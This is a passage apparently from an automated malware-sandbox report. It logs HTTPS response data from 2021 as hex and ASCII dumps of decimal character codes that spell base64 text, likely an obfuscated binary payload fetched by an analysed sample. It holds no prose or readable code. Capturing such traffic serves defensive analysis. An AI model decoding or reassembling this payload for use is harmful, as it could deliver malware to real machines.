                    Data Ascii: 0 52 0 68 0 65 0 65 0 67 0 76 0 120 0 117 0 104 0 120 0 54 0 47 0 47 0 47 0 105 0 52 0 89 0 111 0 87 0 119 0 65 0 65 0 103 0 47 0 103 0 70 0 88 0 51 0 81 0 74 0 103 0 47 0 103 0 71 0 100 0 65 0 81 0 122 0 119 0 79 0 115 0 68 0 77 0 56 0 66 0 65 0 85 0 71
                    2021-10-26 16:59:46 UTC4607INData Raw: 36 37 20 30 20 31 31 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 35 30 20 30 20 31 32 32 20 30 20 38 34 20 30 20 37 31 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 38 37 20 30 20 37 36 20 30 20 31 31 39 20 30 20 34 33 20 30 20 31 30 34 20 30 20 31 31 38 20 30 20 35 34 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 39 37 20 30 20 36 36 20 30 20 36 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 31 31 35 20 30 20 34 39 20 30 20 36 36 20 30 20 31 30 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 36 20 30 20 31 30 35 20 30 20 35 36 20 30 20 38 30 20 30 20 31 31 31 20 30 20 38 38 20 30 20 37 39 20 30 20 31 30 36 20 30 20 34 37 20 30 20 34 37 20 30 20
                    Data Ascii: 67 0 119 0 81 0 65 0 65 0 73 0 50 0 122 0 84 0 71 0 77 0 65 0 65 0 70 0 87 0 76 0 119 0 43 0 104 0 118 0 54 0 80 0 47 0 47 0 97 0 66 0 69 0 69 0 65 0 65 0 67 0 78 0 115 0 49 0 66 0 106 0 65 0 65 0 66 0 86 0 105 0 56 0 80 0 111 0 88 0 79 0 106 0 47 0 47 0
                    2021-10-26 16:59:46 UTC4611INData Raw: 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 34 39 20 30 20 39 30 20 30 20 38 34 20 30 20 38 35 20 30 20 35 30 20 30 20 31 30 36 20 30 20 31 31 32 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 35 31 20 30 20 38 38 20 30 20 35 36 20 30 20 31 30 35 20 30 20 35 36 20 30 20 31 30 32 20 30 20 31 31 31 20 30 20 35 32 20 30 20 37 39 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 37 38 20 30 20 38 37 20 30 20 38 35 20 30 20 34 39 20 30 20 37 38 20 30 20 31 31 31 20 30 20 35 34 20 30 20 31 30 33 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 34 37 20 30 20 37 33 20 30 20 31 31 38 20 30 20 37 32 20 30 20 35 34 20 30 20 37 37 20 30 20 35 31 20
                    Data Ascii: 0 47 0 47 0 85 0 49 0 90 0 84 0 85 0 50 0 106 0 112 0 65 0 119 0 65 0 65 0 47 0 51 0 88 0 56 0 105 0 56 0 102 0 111 0 52 0 79 0 114 0 47 0 47 0 49 0 78 0 87 0 85 0 49 0 78 0 111 0 54 0 103 0 77 0 65 0 65 0 80 0 57 0 49 0 47 0 73 0 118 0 72 0 54 0 77 0 51
                    2021-10-26 16:59:46 UTC4615INData Raw: 20 34 39 20 30 20 31 31 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 31 30 34 20 30 20 31 30 31 20 30 20 38 34 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 38 31 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 38 20 30 20 31 30 37 20 30 20 35 31 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 34 37 20 30 20 37 39 20 30 20 31 30 34 20 30 20 34 39 20 30 20 38 37 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 35 36 20 30 20 38 32 20 30 20 37 33 20 30 20 34 37 20 30 20 35 31 20 30 20 38 38 20 30 20 35 36 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 35 20 30 20 38 35 20 30 20 31 31 39 20 30 20 36 39 20 30 20 36 35 20 30
                    Data Ascii: 49 0 115 0 65 0 65 0 67 0 78 0 104 0 101 0 84 0 118 0 47 0 47 0 57 0 81 0 106 0 89 0 88 0 107 0 51 0 47 0 47 0 47 0 85 0 80 0 57 0 49 0 47 0 79 0 104 0 49 0 87 0 81 0 65 0 65 0 103 0 56 0 82 0 73 0 47 0 51 0 88 0 56 0 47 0 120 0 85 0 85 0 119 0 69 0 65 0
                    2021-10-26 16:59:46 UTC4620INData Raw: 20 31 31 33 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 38 20 30 20 35 32 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 35 20 30 20 36 35 20 30 20 34 33 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 37 39 20 30 20 31 30 33 20 30 20 37 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 35 20 30 20 36 35 20 30 20 34 33 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 37 30 20 30 20 31 30 30 20 30 20 31 31 31 20 30 20 37 37 20 30 20 37 37 20 30 20 34 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 35 30 20 30 20 37 30 20 30 20 36 35 20 30 20 38 30 20 30 20 36 38 20 30 20 34 37 20 30 20 34 37 20 30 20 35 30
                    Data Ascii: 113 0 77 0 66 0 65 0 65 0 73 0 118 0 52 0 106 0 89 0 85 0 65 0 43 0 80 0 47 0 47 0 85 0 79 0 103 0 77 0 47 0 47 0 47 0 47 0 106 0 89 0 85 0 65 0 43 0 80 0 47 0 47 0 85 0 70 0 100 0 111 0 77 0 77 0 49 0 65 0 65 0 73 0 50 0 70 0 65 0 80 0 68 0 47 0 47 0 50
                    2021-10-26 16:59:46 UTC4624INData Raw: 30 20 35 35 20 30 20 37 30 20 30 20 37 30 20 30 20 38 32 20 30 20 38 35 20 30 20 34 39 20 30 20 39 30 20 30 20 38 38 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 37 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 33 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 38 20 30 20 38 31 20 30 20 31 31 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 31 32 32 20 30 20 38 37 20 30 20 38 39 20 30 20 31 31 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 35 37 20 30 20 31 31 36 20 30 20 38 34 20 30 20 38 35 20 30 20 35 32 20 30 20 31 31 38 20 30 20 35 32 20 30 20 39 37 20 30 20 36 39 20 30 20 38 39 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 38 20 30 20 34 37 20 30 20 35
                    Data Ascii: 0 55 0 70 0 70 0 82 0 85 0 49 0 90 0 88 0 47 0 51 0 85 0 77 0 47 0 51 0 85 0 73 0 47 0 120 0 88 0 81 0 119 0 85 0 65 0 65 0 105 0 122 0 87 0 89 0 119 0 85 0 65 0 65 0 77 0 57 0 116 0 84 0 85 0 52 0 118 0 52 0 97 0 69 0 89 0 66 0 65 0 65 0 66 0 88 0 47 0 5
                    2021-10-26 16:59:46 UTC4628INData Raw: 20 30 20 34 39 20 30 20 36 36 20 30 20 35 32 20 30 20 31 31 35 20 30 20 37 31 20 30 20 35 34 20 30 20 31 30 32 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 39 38 20 30 20 38 32 20 30 20 38 31 20 30 20 31 30 35 20 30 20 37 38 20 30 20 38 32 20 30 20 34 37 20 30 20 34 33 20 30 20 37 34 20 30 20 38 32 20 30 20 36 37 20 30 20 38 31 20 30 20 37 33 20 30 20 38 35 20 30 20 31 30 30 20 30 20 31 31 32 20 30 20 34 39 20 30 20 36 38 20 30 20 37 30 20 30 20 37 32 20 30 20 31 30 30 20 30 20 38 38 20 30 20 36 37 20 30 20 38 31 20 30 20 31 30 33 20 30 20 35 30 20 30 20 34 38 20 30 20 38 31 20 30 20 31 30 37 20 30 20 36 39 20 30 20 37 38 20 30 20 34 39 20 30 20 39 39 20 30 20 37 34 20 30 20 36 36 20 30 20 31 30 36 20 30 20 31 30
                    Data Ascii: 0 49 0 66 0 52 0 115 0 71 0 54 0 102 0 103 0 65 0 65 0 65 0 68 0 98 0 82 0 81 0 105 0 78 0 82 0 47 0 43 0 74 0 82 0 67 0 81 0 73 0 85 0 100 0 112 0 49 0 68 0 70 0 72 0 100 0 88 0 67 0 81 0 103 0 50 0 48 0 81 0 107 0 69 0 78 0 49 0 99 0 74 0 66 0 106 0 10
                    2021-10-26 16:59:46 UTC4632INData Raw: 39 30 20 30 20 38 38 20 30 20 31 31 38 20 30 20 35 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 38 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 38 20 30 20 31 31 39 20 30 20 34 37 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 37 30 20 30 20 37 39 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 32 20 30 20 36 36 20 30 20 38 31 20 30 20 39 37 20 30 20 31 30 33 20 30 20 37 31 20 30 20 34 33 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 39 38 20 30 20 34 37 20 30 20 37 30 20 30 20 31 30 31 20 30 20 31 30 36 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 36 20 30 20 38 38 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 38 20 30 20 31
                    Data Ascii: 90 0 88 0 118 0 52 0 65 0 65 0 65 0 65 0 66 0 88 0 106 0 89 0 88 0 119 0 47 0 118 0 47 0 47 0 85 0 70 0 79 0 78 0 82 0 102 0 66 0 81 0 97 0 103 0 71 0 43 0 65 0 65 0 81 0 65 0 65 0 70 0 98 0 47 0 70 0 101 0 106 0 65 0 81 0 65 0 66 0 88 0 106 0 89 0 88 0 1
                    2021-10-26 16:59:46 UTC4636INData Raw: 20 30 20 31 30 39 20 30 20 31 31 33 20 30 20 35 32 20 30 20 31 31 36 20 30 20 37 30 20 30 20 36 37 20 30 20 36 35 20 30 20 34 33 20 30 20 35 30 20 30 20 36 36 20 30 20 36 35 20 30 20 37 38 20 30 20 38 31 20 30 20 39 37 20 30 20 37 32 20 30 20 31 32 32 20 30 20 37 38 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 31 20 30 20 31 30 34 20 30 20 31 31 33 20 30 20 36 37 20 30 20 31 30 38 20 30 20 36 38 20 30 20 31 31 31 20 30 20 39 39 20 30 20 35 30 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 31 20 30 20 37 31 20 30 20 31 30 36 20 30 20 38 35 20 30 20 38 38 20 30 20 31 31 31 20 30 20 38 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 34 37 20 30 20 37 33 20 30 20 31 31 38 20 30
                    Data Ascii: 0 109 0 113 0 52 0 116 0 70 0 67 0 65 0 43 0 50 0 66 0 65 0 78 0 81 0 97 0 72 0 122 0 78 0 81 0 65 0 67 0 78 0 82 0 101 0 104 0 113 0 67 0 108 0 68 0 111 0 99 0 50 0 65 0 65 0 65 0 71 0 111 0 71 0 106 0 85 0 88 0 111 0 85 0 80 0 57 0 49 0 47 0 73 0 118 0
                    2021-10-26 16:59:46 UTC4639INData Raw: 20 30 20 36 35 20 30 20 36 37 20 30 20 37 30 20 30 20 31 31 39 20 30 20 37 30 20 30 20 31 30 38 20 30 20 39 30 20 30 20 31 30 30 20 30 20 38 31 20 30 20 37 38 20 30 20 37 32 20 30 20 35 34 20 30 20 34 33 20 30 20 37 35 20 30 20 37 36 20 30 20 36 36 20 30 20 31 31 31 20 30 20 31 31 36 20 30 20 37 38 20 30 20 36 38 20 30 20 37 33 20 30 20 31 31 38 20 30 20 35 31 20 30 20 37 35 20 30 20 34 37 20 30 20 36 36 20 30 20 37 34 20 30 20 37 39 20 30 20 34 37 20 30 20 37 30 20 30 20 34 33 20 30 20 36 35 20 30 20 31 31 31 20 30 20 31 31 38 20 30 20 31 32 30 20 30 20 31 30 34 20 30 20 31 30 32 20 30 20 39 30 20 30 20 34 33 20 30 20 38 33 20 30 20 36 38 20 30 20 38 30 20 30 20 37 34 20 30 20 31 30 34 20 30 20 31 30 32 20 30 20 39 30 20 30 20 34 33 20 30 20 38 31 20 30
                    Data Ascii: 0 65 0 67 0 70 0 119 0 70 0 108 0 90 0 100 0 81 0 78 0 72 0 54 0 43 0 75 0 76 0 66 0 111 0 116 0 78 0 68 0 73 0 118 0 51 0 75 0 47 0 66 0 74 0 79 0 47 0 70 0 43 0 65 0 111 0 118 0 120 0 104 0 102 0 90 0 43 0 83 0 68 0 80 0 74 0 104 0 102 0 90 0 43 0 81 0
                    2021-10-26 16:59:46 UTC4643INData Raw: 30 20 36 39 20 30 20 36 35 20 30 20 37 33 20 30 20 38 38 20 30 20 37 34 20 30 20 31 30 32 20 30 20 36 36 20 30 20 37 33 20 30 20 35 35 20 30 20 38 33 20 30 20 36 36 20 30 20 31 32 30 20 30 20 35 37 20 30 20 36 38 20 30 20 38 39 20 30 20 31 31 36 20 30 20 38 31 20 30 20 36 38 20 30 20 37 33 20 30 20 31 31 35 20 30 20 37 37 20 30 20 31 30 35 20 30 20 31 31 31 20 30 20 31 31 36 20 30 20 36 35 20 30 20 36 39 20 30 20 37 33 20 30 20 34 38 20 30 20 36 39 20 30 20 38 33 20 30 20 37 37 20 30 20 37 37 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 37 37 20 30 20 37 39 20 30 20 36 38 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 33 20 30 20 37 36 20 30 20 38 33 20 30 20 36 35 20 30 20 31 32 30 20 30 20 38 37 20 30 20 38 36 20 30 20 35 32 20 30 20 34 39 20 30 20 35 32
                    Data Ascii: 0 69 0 65 0 73 0 88 0 74 0 102 0 66 0 73 0 55 0 83 0 66 0 120 0 57 0 68 0 89 0 116 0 81 0 68 0 73 0 115 0 77 0 105 0 111 0 116 0 65 0 69 0 73 0 48 0 69 0 83 0 77 0 77 0 122 0 119 0 77 0 79 0 68 0 43 0 118 0 43 0 76 0 83 0 65 0 120 0 87 0 86 0 52 0 49 0 52
                    2021-10-26 16:59:46 UTC4647INData Raw: 30 20 30 20 34 38 20 30 20 37 39 20 30 20 31 30 35 20 30 20 35 33 20 30 20 34 37 20 30 20 31 30 32 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 35 20 30 20 34 38 20 30 20 38 38 20 30 20 31 30 33 20 30 20 39 30 20 30 20 31 31 31 20 30 20 31 30 37 20 30 20 34 38 20 30 20 31 30 31 20 30 20 37 33 20 30 20 31 31 36 20 30 20 34 39 20 30 20 36 38 20 30 20 36 39 20 30 20 31 30 31 20 30 20 37 34 20 30 20 31 30 32 20 30 20 31 30 32 20 30 20 31 30 35 20 30 20 37 34 20 30 20 38 38 20 30 20 31 30 31 20 30 20 31 32 32 20 30 20 34 37 20 30 20 38 32 20 30 20 31 30 32 20 30 20 36 37 20 30 20 37 36 20 30 20 38 32 20 30 20 31 30 32 20 30 20 36 37 20 30 20 37 38 20 30 20 36 36 20 30 20 36 39 20 30 20 39 30 20 30 20 31 30 39 20 30 20 37 39 20 30 20 38 32 20 30 20 31 30 35 20
                    Data Ascii: 0 0 48 0 79 0 105 0 53 0 47 0 102 0 47 0 47 0 105 0 48 0 88 0 103 0 90 0 111 0 107 0 48 0 101 0 73 0 116 0 49 0 68 0 69 0 101 0 74 0 102 0 102 0 105 0 74 0 88 0 101 0 122 0 47 0 82 0 102 0 67 0 76 0 82 0 102 0 67 0 78 0 66 0 69 0 90 0 109 0 79 0 82 0 105
                    2021-10-26 16:59:46 UTC4652INData Raw: 30 20 36 35 20 30 20 36 37 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 37 20 30 20 31 31 39 20 30 20 31 31 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 34 37 20 30 20 31 30 35 20 30 20 37 30 20 30 20 34 37 20 30 20 35 31 20 30 20 38 31 20 30 20 31 31 32 20 30 20 37 33 20 30 20 38 36 20 30 20 35 31 20 30 20 34 38 20 30 20 31 30 36 20 30 20 38 35 20 30 20 38 38 20 30 20 34 38 20 30 20 38 35 20 30 20 37 31 20 30 20 31 31 31 20 30 20 36 37 20 30 20 38 36 20 30 20 34 37 20 30 20 35 36 20 30 20 38 36 20 30 20 36 35 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 38 20 30 20 36 35 20 30 20 31 30 30 20 30 20 36 35 20 30 20 31 31 34 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 32 20 30 20 38
                    Data Ascii: 0 65 0 67 0 47 0 120 0 87 0 119 0 119 0 69 0 65 0 65 0 105 0 47 0 105 0 70 0 47 0 51 0 81 0 112 0 73 0 86 0 51 0 48 0 106 0 85 0 88 0 48 0 85 0 71 0 111 0 67 0 86 0 47 0 56 0 86 0 65 0 77 0 66 0 65 0 65 0 73 0 88 0 65 0 100 0 65 0 114 0 47 0 100 0 102 0 8
                    2021-10-26 16:59:46 UTC4656INData Raw: 20 38 39 20 30 20 36 37 20 30 20 38 35 20 30 20 38 30 20 30 20 35 36 20 30 20 34 39 20 30 20 38 38 20 30 20 37 37 20 30 20 38 32 20 30 20 36 36 20 30 20 36 35 20 30 20 37 30 20 30 20 31 30 32 20 30 20 31 31 31 20 30 20 31 31 39 20 30 20 31 30 38 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 35 20 30 20 37 30 20 30 20 31 31 31 20 30 20 31 32 30 20 30 20 36 39 20 30 20 36 39 20 30 20 36 35 20 30 20 31 30 35 20 30 20 31 31 39 20 30 20 34 39 20 30 20 31 31 35 20 30 20 31 32 30 20 30 20 36 39 20 30 20 36 39 20 30 20 36 35 20 30 20 31 30 35 20 30 20 31 32 30 20 30 20 38 36 20 30 20 31 30 37 20 30 20 31 32 30 20 30 20 36 39 20 30 20 36 39 20 30 20 36 35 20 30 20 31 30 35 20 30 20 38 31 20 30 20 31 32 31 20 30 20 36 37 20 30 20 31 31 31 20 30 20 38 37
                    Data Ascii: 89 0 67 0 85 0 80 0 56 0 49 0 88 0 77 0 82 0 66 0 65 0 70 0 102 0 111 0 119 0 108 0 85 0 65 0 65 0 75 0 70 0 111 0 120 0 69 0 69 0 65 0 105 0 119 0 49 0 115 0 120 0 69 0 69 0 65 0 105 0 120 0 86 0 107 0 120 0 69 0 69 0 65 0 105 0 81 0 121 0 67 0 111 0 87
                    2021-10-26 16:59:46 UTC4660INData Raw: 36 35 20 30 20 38 35 20 30 20 37 39 20 30 20 31 30 33 20 30 20 39 38 20 30 20 38 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 39 37 20 30 20 31 30 33 20 30 20 31 31 33 20 30 20 37 38 20 30 20 38 32 20 30 20 39 39 20 30 20 36 36 20 30 20 38 31 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 33 20 30 20 35 34 20 30 20 37 35 20 30 20 38 36 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 32 31 20 30 20 37 38 20 30 20 38 32 20 30 20 39 39 20 30 20 36 36 20 30 20 38 31 20 30 20 35 34 20 30 20 36 37 20 30 20 31 31 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 36 38 20 30 20 31 32 30 20 30 20 36 37 20 30 20 36 38 20 30 20 37 34 20 30 20 31 31
                    Data Ascii: 65 0 85 0 79 0 103 0 98 0 85 0 119 0 65 0 65 0 97 0 103 0 113 0 78 0 82 0 99 0 66 0 81 0 47 0 51 0 85 0 73 0 54 0 75 0 86 0 84 0 65 0 65 0 68 0 47 0 100 0 81 0 121 0 78 0 82 0 99 0 66 0 81 0 54 0 67 0 111 0 65 0 65 0 65 0 67 0 68 0 120 0 67 0 68 0 74 0 11
                    2021-10-26 16:59:46 UTC4664INData Raw: 20 39 39 20 30 20 37 38 20 30 20 38 36 20 30 20 31 30 35 20 30 20 34 33 20 30 20 31 32 31 20 30 20 35 32 20 30 20 36 36 20 30 20 36 37 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 31 30 36 20 30 20 34 38 20 30 20 38 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 38 36 20 30 20 31 30 38 20 30 20 39 39 20 30 20 31 32 32 20 30 20 35 37 20 30 20 31 30 39 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 38 20 30 20 34 33 20 30 20 35 31 20 30 20 31 30 32 20 30 20 34 37 20 30 20 34 37 20 30 20 38 36 20 30 20 31 30 38 20 30 20 36 36 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 39 38 20 30 20 38 38 20 30 20 35 36 20 30 20 35 31 20 30 20 31
                    Data Ascii: 99 0 78 0 86 0 105 0 43 0 121 0 52 0 66 0 67 0 73 0 65 0 65 0 79 0 106 0 48 0 85 0 119 0 65 0 65 0 86 0 108 0 99 0 122 0 57 0 109 0 103 0 65 0 73 0 65 0 65 0 65 0 106 0 89 0 88 0 43 0 51 0 102 0 47 0 47 0 86 0 108 0 66 0 109 0 105 0 98 0 88 0 56 0 51 0 1
                    2021-10-26 16:59:46 UTC4668INData Raw: 38 31 20 30 20 34 33 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 38 36 20 30 20 34 33 20 30 20 31 30 35 20 30 20 38 38 20 30 20 38 34 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 39 37 20 30 20 38 30 20 30 20 38 34 20 30 20 37 38 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 34 33 20 30 20 31 31 31 20 30 20 38 30 20 30 20 34 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 39 38 20 30 20 31 31 31 20 30 20 31 30 34 20 30 20 34 38 20 30 20 35 32 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 30 20 30 20 36 39 20 30 20 36 39 20 30 20 37 30 20 30 20 31 30 30 20 30 20 31 31 33 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 33 20 30 20 31 31 31 20 30 20 31 32 32 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30
                    Data Ascii: 81 0 43 0 48 0 65 0 65 0 86 0 43 0 105 0 88 0 84 0 103 0 65 0 65 0 97 0 80 0 84 0 78 0 81 0 65 0 67 0 43 0 111 0 80 0 49 0 65 0 65 0 70 0 98 0 111 0 104 0 48 0 52 0 65 0 65 0 73 0 80 0 69 0 69 0 70 0 100 0 113 0 65 0 71 0 103 0 111 0 122 0 107 0 65 0 65 0
                    2021-10-26 16:59:46 UTC4671INData Raw: 31 30 39 20 30 20 31 30 36 20 30 20 31 30 37 20 30 20 31 32 32 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 34 33 20 30 20 31 30 36 20 30 20 38 30 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 33 20 30 20 35 34 20 30 20 37 36 20 30 20 36 38 20 30 20 35 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 36 38 20 30 20 31 32 30 20 30 20 36 35 20 30 20 31 32 30 20 30 20 31 30 39 20 30 20 31 30 33 20 30 20 31 32 31 20 30 20 38 37 20 30 20 38 31 20 30 20 34 33 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 35 37 20 30 20 31 30 31 20 30 20 38 37 20 30 20 35 36 20 30 20 31 31 30 20 30 20 36 38 20 30 20 38 36 20 30 20 31 31 37
                    Data Ascii: 109 0 106 0 107 0 122 0 85 0 65 0 65 0 85 0 43 0 106 0 80 0 84 0 65 0 65 0 65 0 47 0 51 0 85 0 73 0 54 0 76 0 68 0 57 0 47 0 47 0 43 0 68 0 120 0 65 0 120 0 109 0 103 0 121 0 87 0 81 0 43 0 48 0 65 0 65 0 65 0 70 0 57 0 101 0 87 0 56 0 110 0 68 0 86 0 117
                    2021-10-26 16:59:46 UTC4675INData Raw: 20 30 20 31 31 31 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 31 30 39 20 30 20 37 36 20 30 20 31 30 30 20 30 20 31 32 30 20 30 20 36 37 20 30 20 37 30 20 30 20 35 37 20 30 20 31 31 30 20 30 20 38 31 20 30 20 37 37 20 30 20 35 34 20 30 20 38 30 20 30 20 31 30 36 20 30 20 31 31 36 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 38 37 20 30 20 35 34 20 30 20 37 34 20 30 20 37 38 20 30 20 37 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 39 30 20 30 20 31 30 35 20 30 20 35 31 20 30 20 39 39 20 30 20 37 37 20 30 20 31 30 34 20 30 20 31 30 32 20 30 20 39 30 20 30 20 34 38 20 30 20 36 38 20 30 20 37 39 20 30 20 31 30 36 20 30 20 31 30 38 20 30 20 35 35 20 30 20 31 30 32 20 30 20 34 37 20 30 20 34 37 20 30 20 38 36 20 30 20 31 31 37 20
                    Data Ascii: 0 111 0 65 0 65 0 70 0 109 0 76 0 100 0 120 0 67 0 70 0 57 0 110 0 81 0 77 0 54 0 80 0 106 0 116 0 47 0 47 0 57 0 87 0 54 0 74 0 78 0 75 0 65 0 65 0 66 0 90 0 105 0 51 0 99 0 77 0 104 0 102 0 90 0 48 0 68 0 79 0 106 0 108 0 55 0 102 0 47 0 47 0 86 0 117
                    2021-10-26 16:59:46 UTC4679INData Raw: 31 31 39 20 30 20 37 33 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 37 33 20 30 20 31 30 39 20 30 20 37 32 20 30 20 31 31 39 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 38 30 20 30 20 36 35 20 30 20 31 30 35 20 30 20 38 36 20 30 20 35 37 20 30 20 37 37 20 30 20 31 30 35 20 30 20 38 35 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 30 35 20 30 20 39 30 20 30 20 34 33 20 30 20 34 38 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 38 39 20 30 20 31 30 31 20 30 20 35 32 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 38 39 20 30 20 31 30 31 20 30 20 35 36 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20
                    Data Ascii: 119 0 73 0 122 0 119 0 73 0 109 0 72 0 119 0 65 0 73 0 65 0 65 0 68 0 80 0 65 0 105 0 86 0 57 0 77 0 105 0 85 0 100 0 81 0 105 0 90 0 43 0 48 0 65 0 103 0 65 0 65 0 105 0 89 0 101 0 52 0 65 0 103 0 65 0 65 0 105 0 89 0 101 0 56 0 65 0 103 0 65 0 65 0 105
                    2021-10-26 16:59:46 UTC4684INData Raw: 20 38 31 20 30 20 31 32 30 20 30 20 35 36 20 30 20 35 32 20 30 20 38 37 20 30 20 39 38 20 30 20 35 31 20 30 20 31 31 39 20 30 20 31 31 39 20 30 20 36 35 20 30 20 38 31 20 30 20 31 30 30 20 30 20 38 31 20 30 20 38 37 20 30 20 37 36 20 30 20 31 30 32 20 30 20 31 30 37 20 30 20 38 34 20 30 20 31 31 34 20 30 20 36 35 20 30 20 35 32 20 30 20 31 31 36 20 30 20 34 33 20 30 20 38 33 20 30 20 38 30 20 30 20 34 33 20 30 20 35 30 20 30 20 31 31 31 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 31 30 34 20 30 20 34 33 20 30 20 31 32 30 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 38 36 20 30 20 35 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 38 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20
